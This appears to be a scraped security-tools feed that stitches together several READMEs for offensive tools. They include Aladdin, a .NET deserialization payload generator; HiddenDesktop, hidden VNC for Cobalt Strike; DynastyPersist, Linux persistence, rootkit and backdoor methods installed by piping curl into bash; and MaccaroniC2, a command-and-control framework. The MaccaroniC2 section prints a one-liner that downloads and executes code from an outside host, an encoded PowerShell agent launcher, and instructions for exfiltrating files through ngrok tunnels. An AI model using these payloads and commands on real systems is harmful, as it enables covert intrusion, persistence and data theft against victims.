pip install "T3SF[Slack]"  # Install the framework to work with Slack

This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

Usage

We created this framework to simplify all your work!

Using Docker

Supported Tags

  • slack β†’ This image has all the requirements to perform an exercise in Slack.
  • discord β†’ This image has all the requirements to perform an exercise in Discord.

Using it with Slack

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

Using it with Discord

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


Once you have everything ready, use our template for the main.py, or modify the following code:

Here is an example if you want to run the framework with the Discord bot and a GUI.

from T3SF import T3SF
import asyncio

async def main():
await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

if __name__ == '__main__':
asyncio.run(main())

Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

Yes, that simple!

await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

If you need more help, you can always check our documentation here!



Aladdin - Payload Generation Technique That Allows The Deseriallization Of A .NET Payload And Execution In Memory

By: Zion3R


Aladdin is a payload generation technique based on the work of James Forshaw (@tiraniddo) that allows the deseriallization of a .NET payload and execution in memory. The original vector was documented on https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html.

By spawning the process AddInProcess.exe with arguments /guid:32a91b0f-30cd-4c75-be79-ccbd6345de99 and /pid:, the process will start a named pipe under \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de99 and will wait for a .NET Remoting object. If we generate a payload that has the appropiate packet bytes required to communicate with a .NET remoting listener we will be able to trigger the ActivitySurrogateSelector class from System.Workflow.ComponentModel. and gain code execution.


Originally, James Forshaw released a POC at https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData. However this POC will fail on recent versions of Windows since Microsoft went ahead and patched the vulnerable System.Workflow.ComponentModel (https://github.com/microsoft/dotnet-framework-early-access/blob/master/release-notes/NET48/dotnet-48-changes.md).

Nick Landers (@monoxgas) however, identified a way to disable the check that Microsoft introduced and wrote a detailed article at https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/ . The bypass is documented at pwntester/ysoserial.net#41 .

Aladdin is a payload generation tool, which using the specific bypass as well as the necessary header bytes of the .NET remoting protocol is able to generate initial access payloads that abuse the AddInProcess as originally documented.

The provided templates are:

* HTA

* VBA

* JS

* CHM

Notes

In order for the attack to be successfull the .NET assembly must contain a single public class with an empty constructor to act as the entry point during deserialization. An example assembly has been included in the project.

Usage
Usage:
-w, --scriptType=VALUE Set to js / hta / vba / chm.

-o, --output=VALUE The generated output, e.g: -o
C:\Users\Nettitude\Desktop\payload

-a, --assembly=VALUE Provided Assembly DLL, e.g: -a
C:\Users\Nettitude\Desktop\popcalc.dll

-h, --help Help

OpSec

  • The user supplied .NET binary will be executed under the AddInProcess.exe that gets spawned from the HTA / JS payload. The spawning of the processes currently happens using the 9BA05972-F6A8-11CF-A442-00A0C90A8F39 COM object (https://dl.packetstormsecurity.net/papers/general/abusing-objects.pdf) which will launch the process as a child of Explorer.exe process.

  • The GUID supplied in the process parameters of AddInProcess.exe can be user controlled. At the moment the guid is hardcoded in the template and the code.

  • CHM executes the JScript through XSLT transformation

Defensive Considerations

  • Addinprocess.exe will always launch with /guid and /pid. Baseline your environment for legitimate uses - monitor the rest

Useful References:

* https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html

* https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/

Readme / Credits

Code is based on the following repos:

* https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData

* https://github.com/pwntester/ysoserial.net

Shouts to:

  • @m0rv4i for helping with C# nuances
  • @ace0fspad3s for troubleshooting
  • @ Nettitude RT for being awesome


Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

By: Zion3R


WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

It was inspired by ntdiff and made possible with the help of Winbindex.


How It Works

WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations if you need to. See the next section for that.

Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information are unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

How to Build

Prerequisites

  • Rust 1.68 or superior
  • Node.js 16.8 or superior

Command-Line

The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

# Resolve the project's root folder
PROJECT_ROOT=$(git rev-parse --show-toplevel)

# Generate databases
cd "$PROJECT_ROOT/windiff_cli"
cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

# Build the frontend
cd "$PROJECT_ROOT/windiff_frontend"
npm ci
npm run build

The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R


Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Usage

Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:

hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome

You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]

Demo

Hidden.Desktop.mp4

Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.

Compatibility

The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.

Credits



Proxmark3 4.17511 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed Faraday.

DynastyPersist - A Linux Persistence Tool!

By: Zion3R


  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


Features

  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

Usage

  1. Clone this repository to your local machine:

    git clone https://github.com/Trevohack/DynastyPersist.git
  2. One linear

    curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Support

For support, email spaceshuttle.io.all@gmail.com or join our Discord server.

  • Discord: https://discord.gg/WYzu65Hp

Thank You!



MaccaroniC2 - A PoC Command And Control Framework That Utilizes The Powerful AsyncSSH

By: Zion3R


MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration. This tool is inspired for a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands by the attacker.

The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more.

Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, using TOR to enhance anonymity.

  • Ngrok free account only allows the usage of one tunnel at a time. With some changes this tool could be perfect for a BOT-like C&C framework to control multiple SSH instances, but you would need to upgrade your plan on the Ngrok website, see https://ngrok.com/pricing

Setup and Procedure

  1. Run python3 gen_rsa.py to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine.

  2. Edit the asyncssh_server.py file and place the contents of the newly generated id_rsa.pub inside the pub_key variable. The asyncssh_server.py provide an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.

  3. Create a free account on Ngrok site and take note of the AUTH Token.

  4. Add the AUTH token to the token variable in asyncssh_server.py, this needs to be harcoded inside the ngrok_tunnel() function.

  5. Create a free API key on the Ngrok website. Take note of the generated string.

  6. Put the API key string in the api_key variable inside the async_commander.py file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.

  7. Perform the same step for get_endpoints.py file. This script retrieves various useful information about active tunnels.

Send commands to server

With async_commander.py you can send any command to the server. It automatically requests the Ngrok tunnel's domain and port activated by the victim using Ngrok official API.

Please note also that the id_rsa needs to be in the same folder of async_commander.py

Basic Usage

Run server on victim machine:

python3 asyncssh_server.py


From the attacker machine send command using socks proxy:

python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050


Send command without using a proxy:

python3 asyncssh_commander.py "whoami"


Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):

python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte"

Meterpreter web_delivery module

python3 asyncssh_commander.py "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());\""


Get list of active tunnels:

python3 get_endpoints.py


Generate new RSA key pairs:

python3 gen_rsa.py

Advanced Usage

Using SFTP and SCP - you don't need a valid username just the correct id_rsa

  • With proxy:

proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path


  • No proxy:

sftp -P PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path


Compiling with Nuitka

python -m pip install nuitka

python -m nuitka --standalone --onefile asyncssh_server.py


Weaponized server

https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py

For furter information check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it’s important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.



❌